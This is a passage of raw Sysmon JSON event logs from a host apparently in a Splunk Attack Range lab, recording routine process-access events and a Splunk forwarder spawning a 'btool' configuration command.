C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00102A620500}\r\nTargetProcessId: 2840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00102A620500}","TargetProcessId":"2840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.360\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-00102A620500}\r\nSourceProcessId: 2840\r\nSourceThreadId: 2844\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.360","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-00102A620500}","SourceProcessId":"2840","SourceThreadId":"2844","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.397\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-0010F0640500}\r\nProcessId: 4740\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nParentProcessId: 4400\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.397","ProcessGuid":"{41C8662E-1FF4-5F25-0000-0010F0640500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010435B0500}","ParentProcessId":"4400","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nSourceProcessId: 4400\r\nSourceThreadId: 656\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010F0640500}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","SourceProcessId":"4400","SourceThreadId":"656","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010F0640500}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010F0640500}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010F0640500}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 